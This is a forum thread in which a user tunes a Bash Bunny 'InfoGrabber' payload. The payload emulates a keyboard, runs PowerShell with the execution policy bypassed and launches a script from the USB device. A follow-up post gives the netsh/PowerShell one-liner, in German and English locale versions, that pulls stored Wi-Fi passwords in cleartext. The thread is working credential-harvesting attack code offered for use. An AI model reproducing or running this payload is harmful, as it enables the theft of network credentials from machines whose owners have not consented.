rowie Posted September 15, 2017 Share Posted September 15, 2017 Hi bunny lovers, the InfoGrabber is very nice and i have optimized the payload commands a little bit LED SETUP ATTACKMODE HID STORAGE # Set your language here DUCKY_LANG de GET SWITCH_POSITION RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED G #Green means good to go but there is no way for me to see any wifi password inside. only: Quote W-Lan profiles: ================================================================== ProfileName ProfilePassword ----------- --------------- blabla-wifi The password is not stored in this profile blabla2-wifi The password is not stored in this profile blabla3-wifi The password is not stored in this profile blabla4-wifi The password is not stored in this profile when i run the: netsh wlan show profile name=blabla-wifi key=clear i got an .xml file with the password inside. pls help pros! thx, rowie Quote Link to comment Share on other sites More sharing options...
rowie Posted September 15, 2017 Author Share Posted September 15, 2017 found it! de - en was the problem en: $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() de: $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Schlüsselinhalt") -split ":")[1]).Trim() now it works! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.